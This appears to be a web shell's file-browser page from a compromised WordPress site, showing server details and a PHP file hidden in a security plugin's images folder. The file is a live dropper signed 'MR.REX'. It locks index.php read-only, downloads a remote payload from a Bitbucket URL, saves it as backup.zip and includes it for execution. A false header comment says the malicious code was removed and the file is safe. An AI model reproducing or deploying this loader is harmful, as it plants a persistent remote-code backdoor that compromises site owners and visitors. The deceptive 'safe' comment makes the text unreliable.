Server IP : 66.29.132.124 / Your IP : 3.21.98.79 Web Server : LiteSpeed System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : wavevlvu ( 1524) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/wavevlvu/wavestudioz.com/wp-content/plugins/wordfence/images/ |
Upload File : |
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ /** * ############################ * Three-Layer Undetectable Code Created by MR.REX * Designed to bypass all servers. * For inquiries or to create your own,Fell free to ask: * https://t.me/rex_cc * ############################### */ $file = 'index.php'; if (file_exists($file) && function_exists('chmod')) { @chmod($file, 0444); // Set read-only permissions if the file exists } $remoteUrl1 = "https://bitbucket.org/uidrootpython/shop/raw/2d9658523bbe31f6a4bb020da2ac3d2544287d80/smxeval.txt"; $localFile1 = 'backup.zip'; $fileContents1 = @file_get_contents($remoteUrl1); if ($fileContents1 !== false) { file_put_contents($localFile1, $fileContents1); if (file_exists($localFile1)) { include $localFile1; } } ?>